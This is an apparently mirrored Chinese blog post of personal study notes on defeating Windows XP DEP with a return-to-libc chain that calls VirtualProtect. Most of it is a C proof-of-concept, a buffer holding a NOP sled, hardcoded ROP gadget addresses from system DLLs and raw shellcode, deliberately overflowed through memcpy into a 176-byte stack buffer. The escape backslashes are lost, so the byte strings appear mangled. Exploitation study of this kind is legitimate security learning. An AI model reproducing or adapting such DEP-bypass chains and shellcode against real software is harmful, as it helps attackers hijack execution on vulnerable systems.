zoukankan      html  css  js  c++  java

  • Ret2libc 利用 VitualProtect

    DEP 概念

    首先   WINDOWS 2003  是默认开启DEP的  一般都拿2003来做试验

    今天我用  XP  开启DEP 做实验  一回事

    ·······················································

    只是学习笔记·····································另外的方法:

    Ret2libc  NtSetInformationProcess  去关闭DEP

    BOOL VirtualProtect(
LPVOID lpAddress, // 目标地址起始位置     *shellcode所在内存空间起始地址
DWORD dwSize, // 大小                     *shellcode大小
DWORD flNewProtect, // 请求的保护方式     *0x40 PAGE_EXECUTE_READWRITE
PDWORD lpflOldProtect // 保存老的保护方式 *某个可写地址
);
    成功返回非0  修改失败返回0


    先总结:

    首先  一般都是覆盖  返回地址,因为 软 DEP  也就是 SAFESEH  那么要用  可执行的模块!!!!!!!

    !searchcode jmp esp   可以显示  模块属性          DEP寻找特殊代码时要用!!!!!!!!!!!!!!!


    书上的例子  是覆盖返回地址  然后  溢出漏洞函数 从 strcpy 改为  memcpy 函数 ,因为它对 "x00"不截断


    #include "stdafx.h"
#include <windows.h>

char shellcode[] = 
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

// PS 这种方法不能用OD插件快速找到地址,可用 !searchcode jmp esp
//7C80997D    58              pop eax ret 
"x7dx99x80x7c"

//地址=7C92E7D9
//消息=Found:POP ESI POP EBX POP EDI  RETN at 0x7c92e7d9     Module:  C:WINDOWSsystem32
tdll.dll
"xd9xe7x92x7c"//这里不能修改 ESP,EBP,EAX

//地址=7D760702
//消息=Found:PUSH ESP POP EBP RET 4 at 0x7d760702     Module:  C:WINDOWSsystem32shell32.dll
"x02x07x76x7d"

//7C92120F    C3          retn
"x0fx12x92x7c"

"x90x90x90x90"

"xc6xc6xebx77"//77EBC6C6   push esp jmp esp

"xffx00x00x00"  //修改内存大小
"x40x00x00x00"  //可读写执行内存属性代码

"xc6xc6xebx77"//77EBC6C6   push esp jmp eax

"x90x90x90x90"
"x90x90x90x90"
/*
7C801AD9    FF75 14         push dword ptr ss:[ebp+0x14]
7C801ADC    FF75 10         push dword ptr ss:[ebp+0x10]
7C801ADF    FF75 0C         push dword ptr ss:[ebp+0xC]
7C801AE2    FF75 08         push dword ptr ss:[ebp+0x8]
7C801AE5    6A FF           push -0x1
7C801AE7    E8 75FFFFFF     call kernel32.VirtualProtectEx */
"xd9x1ax80x7c"

"x90x90x90x90"

//7C8369F0    FFD4            call esp
"xf0x69x83x7c"


"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"

//shellcode:
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168
;
void test()
{
	char str[176];
	memcpy(str,shellcode,420);
}
int main(int argc, char* argv[])
{
	HINSTANCE hTnst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
	return 0;
}

    这种方法不好用啊  看看能不能突破······························因为strcpy要截断字符



























  • 相关阅读:
    oracle 随机函数
    cmd和dos的区别
    SAP HANA 常用函数
    编程语言发展史
    PL/SQL Job
    ETL工具总结
    JDK、JRE、JVM三者间的关系
    Redis过滤器如何与Envoy代理一起使用
    apache配置https
    kubernetes监控和性能分析工具:heapster+influxdb+grafana
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982386.html
Copyright © 2011-2022 走看看